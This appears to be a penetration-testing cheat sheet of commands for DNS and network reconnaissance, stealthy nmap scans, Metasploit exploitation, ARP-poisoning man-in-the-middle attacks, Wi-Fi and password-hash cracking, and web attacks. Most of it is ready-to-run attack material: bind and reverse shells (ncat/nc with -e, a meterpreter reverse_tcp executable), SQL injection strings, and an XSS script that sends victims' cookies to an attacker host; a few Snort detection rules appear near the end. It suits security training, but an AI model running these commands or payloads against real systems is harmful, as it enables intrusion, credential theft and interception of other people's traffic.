Ethical Hacking Cheat Sheet
Get name servers
dig @127.0.0.1 example.com ns
Get mail servers
dig @127.0.0.1 example.com mx
Get all records / zone transfer
dig @127.0.0.1 example.com axfr
AXFR is used to replicate DNS databases, so it will pull all records. It may not be allowed by the server, however.
dnsrecon -n example.com -r 126.96.36.199-188.8.131.52
-n specifies the name server, and
-r the range.
This relies on the DNS server storing reverse records.
DNS proxy / mitm
This is especially useful when we cannot force an application to use a proxy server of our choosing, such as applications that ignore OS HTTP proxy settings.
Without parameters, runs as a proxy, which allows us to intercept requests.
sudo dnschef --interface=<if> --fakeip=184.108.40.206 --fakedomains=example.com
This intercepts requests for
example.com and resolves them to
Debug it by running dig against it with the
@ option to specify the name server:
dig @10.0.0.123 example.com
This part of the course doesn't look very passive to me, but it is taught in the passive intelligence section.
Find community strings
onesixtyone 10.0.0.123 -c /usr/share/doc/onesixtyone/dict.txt
snmpwalk -v 2c -c secret 10.0.0.123
Use the appropriate version (-v) and community string (-c).
Enumerate processes (OID)
snmpwalk -v 2c -c secret 10.0.0.123 220.127.116.11.18.104.22.168.2.1.2
Use other OIDs to enumerate different values of the system.
Enumerate processes (MIB)
snmpwalk -v 2c -c secret 10.0.0.123 hrSWRunName
sudo netdiscover -r 10.0.0.0/16
Passively discovers hosts on the network by listening for ARP and other types of packets.
Ping scan/sweep (no port scan)
nmap -sn 10.0.0.0/24
nmap -sL 10.0.0.0/24
Performs reverse DNS lookups, like
dnsrecon. Does not send any packets to the
nmap -sT 10.0.0.123
- Issues a
connect()system call. Performs the full TCP handshake and closes the connection with a RST package.
- Does not require root privileges.
- Easily detected since servers typically log connections.
- If no port is specified, tests common ports.
Comma and range syntax
nmap -sT 10.0.0.123,124
nmap -sT 10.0.0.50-80
Use this to target multiple hosts.
Greppable output format
nmap 10.0.0.123 -oG out.txt
Get IP addresses from a ping scan
nmap -sn 10.0.0.0/24 -oG pingscan.txt cat pingscan.txt | cut -f2 -d" "
Read and scan IPs from a text file
nmap -iL pingscan.txt
Test port 80
nmap -p 80 10.0.0.123
Connect scan port 80
nmap -sT -p 80 10.0.0.123
UDP scan port 53
sudo nmap -sU -p53 10.0.0.123
For most ports, sends an empty packet. For some ports, sends a protocol-specific payload to increase response rate.
TCP + UDP scan
sudo nmap -sT -sU 10.0.0.123
Will simultaneously test target ports using TCP and UDP.
sudo nmap -sO 10.0.0.123
Determines which IP protocols (TCP, ICMP, IGMP, etc) are supported by the target.
Service identification / version detection
nmap -sV 10.0.0.123
Performs service identification through banner grabbing. For HTTP, you can imagine this performing a HEAD request to identify the server and its version.
nmap -sV -p80 10.0.0.123
nmap -sC 10.0.0.123
-sC to perform a script scan. Nmap has various scripts built in, and will
execute them all by default. You can also run specific scripts:
sudo nmap -sC -sU -p161 10.0.0.123 --script=snmp-sysdescr --script-args snmpcommunity=secret
TLS cipher scan
nmap --script ssl-enum-ciphers -p 443 10.0.0.123
Returns cipher suites and compressors used by the server, graded A-F based on strength.
nmap -p 80 --script http-shellshock --script-args uri=/cgi-bin/vulnscript.sh 10.0.0.123
MySQL brute force
nmap -p 3306 --script mysql-brute 10.0.0.123
Understanding and debugging nmap
--packet-trace option to print a summary of packets sent and received
by nmap. Applies to all types of scans, not just
-sn in this example.
nmap -sn 10.0.0.24/ --packet-trace
Used to craft custom packets. Can be used for all sorts of things.
Scan port 80
sudo hping3 -I interface -S 10.0.0.123 -p 80
Scan a range of ports
sudo hping3 -I interface -S 10.0.0.123 --scan 1-81
Spoof the source IP
sudo hping3 -I interface -S 10.0.0.123 -a 22.214.171.124 -p 80
If port 80 is open on the target, the target will reply to
Scanning on mobile
Install BusyBox to get GNU tool replicas on the phone.
busybox arping 10.0.0.123
busybox pscan 10.0.0.123
Nmap builds are available for mobile. Install nmap on the device. See command reference above.
Stealthy Network Recon
Nmap timing template
nmap -T <polite | sneaky | paranoid | ...>
Use this for different degrees of stealth / scanning speed.
Nmap scan delay
nmap --scan-delay 2s
Nmap waits at least this amount of time between each probe it sends to the target.
nmap -sS 10.0.0.123
SYN and waits for the response. If the response is
the port is open; if it's
RST, assumes it is closed. In the first case, Nmap
will not send the final
ACK to complete the handshake.
This is actually the default scan option for nmap (needs root, otherwise falls
back to a TCP connect() scan,
nmap -sF 10.0.0.123
If the port is closed, the target will respond with
RST. If the port is open,
the target does not respond and instead ignores our
Windows is an exception to the above: it always responds with a
RST, so it
will appear that ports are always closed. On the bright side, if we know a given
port is open and we see this behaviour with
FIN scans, then we know the target
is a Windows host.
Will trigger any decent IDS like snort, so not really decent in practice.
nmap -sX 10.0.0.123
Same response behaviour as in the case of
Will trigger any decent IDS.
nmap -sN 10.0.0.123
Same response behaviour as in the case of
Will trigger any decent IDS.
sudo nmap -sI zombie target
Scans ports on the target by spoofing packets that appear to come from a third host. The third host is probed for its IPID, which usually increments sequentially. The third host is required to be idle to make the IPID increments predictable.
sudo nmap -sS -p80 10.0.0.123 -D126.96.36.199,188.8.131.52,184.108.40.206,220.127.116.11
This will scan the target, but it will also spoof packets that appear to be coming from the given decoy IPs. It will look as if those IPs are also scanning the network.
RND options for the manual for more.
ME inserts your IP
at a specific point in the list (its position is otherwise randomized).
generates a random, non-reserved IP address.
ICMP timestamp request
sudo nmap -sn -PE -PP 10.0.0.123 --send-ip
By default, Nmap uses ping / icmp requests for host discovery. Many hosts have ping turned off to appear to be unreachable, however, in an attempt to dodge scanners.
Instead, we can get Nmap to send ICMP timestamp requests (13), which a host
might not be blocking.
-PE enables the feature,
-PP specifies an ICMP
--send-ip asks Nmap to send packets via raw IP sockets.
Subnet mask request
sudo nmap -sn -PE -PM 10.0.0.123 --send-ip
Similar comments as in the case above in terms of stealth and motivation.
sudo nmap -f -sS 10.0.0.123
A fragmentation scan (
-f) will send tiny fragmented IP packets to the target
in an attempt to evade IDSs. This splits up TCP headers over several packets
to make it harder for IDSs to detect the scan.
(The example above uses
-sS for a SYN scan, but you can combine
other types of scans.)
Sniff port 80
sudo tshark -i interface -f "tcp port 80"
sudo tshark -i interface -f "icmp"
Finding and Exploiting Vulnerabilities
sudo lynis -c
Run all tests.
sudo lynis --pentest
For when you don't have root privileges.
Quick and quiet
sudo lynis --pentest -q -Q
-Q) and quiet (
-q) scan which does not prompt for user input and reports only warnings.
Log and report
sudo cat /var/log/lynis-report.dat sudo cat /var/log/lynis.log
Check the report and logs for more details on the results of a scan.
Start database service
Start metasploit framework console
Import Nessus report
Search for vulnerability in the report
vulns -S shellshock
Replace shellshock with the vulnerability you are looking for.
Search for exploits for a vulnerability
In this example we use the vulnerability's OSVDB ID.
Launching an exploit
use exploit/multi/http/apache_mod_cgi_bash_env_exec show options # Set exploit-specific parameters. set RHOST 10.0.0.123 set TARGETURI /cgi-bin/vulnscript.sh show payloads set PAYLOAD linux/x86/shell/reverse_tcp set LHOST 10.0.0.10 exploit
Generic Payload Handler
Provides the Metasploit payload system to exploits launched outside of the framework. Launches a listener that the exploit can connect to.
hydra -L users.txt -P passwords.txt 10.0.0.123 ftp
For separate user and password files.
hydra -C accounts.txt 10.0.0.123 ftp
For a file with lines formatted as
To experiment with sniffing and MITM, you can set up virtual networks on your machine using Mininet.
For ARP posioning, specifically, see mininettcphijacking.
Run command on host inside the Mininet prompt
h1 is the host; it could be
date is the command we are running in this particular example.
Run command on host
mininet/m h1 date
m tool provided by mininet.
For a MITM, enable forwarding to avoid breaking the target's traffic:
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
Write and display:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
Poison a specific target
sudo arpspoof -i eth0 -t 10.0.0.123 10.0.0.111
10.0.0.123 believe that we are
10.0.0.111. The latter could be
the gateway, for example.
To sniff the traffic between two hosts, we must poison both.
Poison the entire subnet
sudo arpspoof -i eth0 10.0.0.111
Simply leave the target (
-t) option out to poison the entire subnet.
dsniff -i eth0
Perform a MITM using ARP poisoning first to sniff passwords from a target.
Ettercap automates ARP poisoning setups for MITM attacks and is also able to dissect packets for various application-layer protocols.
MITM all hosts on the subnet
ettercap -T -i eth0 -M arp:remote -L /tmp/mitm ///
-Tis for terminal mode, as opposed to GUI.
-Mspecifies the MITM mode.
-Lis to create log files.
///is where you specify the target IPs. Three slahes tells Ettercap to scan and poison all hosts on the subnet.
-L option makes Ettercap create two files:
.ecp- logged packets.
.eci- captured information from the session, like credentials.
driftnet -i eth0
Sniffs for images in the traffic.
dnsspoof -i eth0 -f hosts_file
dnsspoof forges replies to DNS address / pointer queries. Set up a MITM first
with ARP poisoning.
Sits as a proxy between a web client and a web server.
Social Engineering Toolkit (SET)
Among many other things, SET can set up Website clones that deliver exploits to the visitor. These can be browser-specific, or it can be autopwn, which detects the browser and attempts the relevant exploits. The payload can be meterpreter. SET can also be used for credential stealing and other attacks.
run packetrecorder -li
run packetrecorder -i 1
Select the appropriate interface.
aircrack-ng to capture traffic first.
Inspect captured traffic
tshark -r capture.pcap
Crack a WEP key
Crack WPA2 key
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.pcap
This crack relies on a word list. The
rockyou.txt word list is directly
available on Kali Linux.
Windows Lanman passwords
Windows stores LM hashes alongside NTLM hashes unless configured otherwise through a registry key. This is for backwards compatibility to authenticate with lder systems.
Dump hashes with pwdump2
pwdump2 > hashes.txt
pwdump2 to dump password hashes. This injects a DLL into
Dump hashes with meterpreter
Crack with John the Ripper
If you know the format:
john hashes.txt --format=nt2
Crack with Cain & Abel
On Windows, you can also crack the passwords with
Cain & Abel.
john also exists for Windows.
unshadow passwd shadow > passwords.txt
/etc/shadow files from the target, then unshadow
unshadow is part of the John the Ripper package. It combines both the
shadow and passwd files so that John can use them.
passwords is the file resulting from the unshadow step above.
Crack passwords using a wordlist
john passwords.txt -w=wordlist.txt
john --show passwords.txt
passwords.txt is the same file that was given to John to crack.
Covert Channels and IDS Evasion
Run in IDS mode
snort -A console -i eth0 -c /etc/snort/snort.conf -l /var/log/snort -K pcap
-A is for alerts, which are displayed on the
Packet capture - text mode
snort -dev -i eth0 > capture.txt
Custom rules file
Alert on ICMP requests to any host on the network
alert icmp any any -> $HOME_NET any (msg:"ICMP test"; sid:1000001;)
alert- Rule action. Generate an alert when the set condition is met.
icmp- Protocol. ICMP, TCP, and UDP.
any- Source IP.
anymatches all source IPs.
any- Source port.
anymatches all source ports.
->- Direction. In this case, from source to destination.
$HOME_NET- Destination IP.
$HOME_NETis given by the snort.conf file.
any- Destination port.
anymatches all destination ports.
msg- Message included with the alert.
sid- Snort rule ID. IDs <=
Alert on FTP connections
alert tcp any any -> $HOME_NET 21 (msg:"FTP connection attempt"; sid:1000002;)
Not that this rule does not actually care whether the connection succeeds / an FTP server is actually running. It simply reacts to the traffic.
Alert on message content
alert tcp any any -> $HOME_NET any (msg:"System file access"; content:"cat /etc/passwd"; sid:1000003;)
This will alert whenever the string
cat /etc/passwd is found in a request.
ncat --ssl -l -p 999 -e /bin/sh
Listens on 999 and drops a shell upon receiving a client connection. The channel is encrypted with SSL.
This transmits messages by hiding them in TCP/IP headers, transferring one byte at a time.
Start the listener
sudo covert_tcp -dest localhost -source localhost -source_port 10000 -dest_port 20000 -server -file /tmp/receive/file.txt
Send the message
sudo covert_tcp -dest localhost -source localhost -source_port 20000 -dest_port 10000 -file /tmp/send/file.txt
Using Trojans and Backdoors
nc -L -p 2000 -k -e cmd.exe
Gets netcat to listen (
-L) on port 2000 (
-p 2000) and bind a shell (
upon receiving a connection.
-k makes netcat continue listening even after the
Buffer Overflow Exploits
Generate payloads with metasploit
Port bind in Perl
msfpayload windows/shell/bind_tcp LPORT=4444 P
This generates port bind shellcode in Perl (
P) format that listens on port 4444.
Reverse shell executable
msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.10 LPORT=5555 X > payload.exe
Exploiting Common Web Application Vulnerabilities
' or 1=1#
' or 1=1;--
; echo hi
Test for XSS
Execute cookie grab
<script> var i = new Image(); i.src="http://10.0.0.10/grabcookie.php?cookie=" + document.cookie; </script>
grabcookie.php script would read the
cookie URL parameter and write it
to a file.
Test for injection
Run OS command
Find programs that a user can run with sudo
sudo -l -U user_name